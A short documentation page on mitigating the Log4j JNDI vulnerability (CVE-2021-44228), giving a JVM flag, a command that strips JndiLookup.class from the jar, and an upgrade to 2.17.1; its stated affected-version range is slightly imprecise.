Log4j Vulnerability Fix

The logj vulnerability (CVE-2021-44228) affects versions between 2.0 and 2.17.0 A malicious attacker can forge a log string by forcing the library, through the JNDI tag, to load and execute code hosted on another system, outside the domain where the application is installed.

Admins can set the env flag -Dlog4j2.formatMsgNoLookups=true as an immediate fix

Next remove the class

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

The permanent fix is to replace the log4j jars in the classpath with the version 2.17.1 or later

PreviousSqoop Troubleshooting

Last updated 2 years ago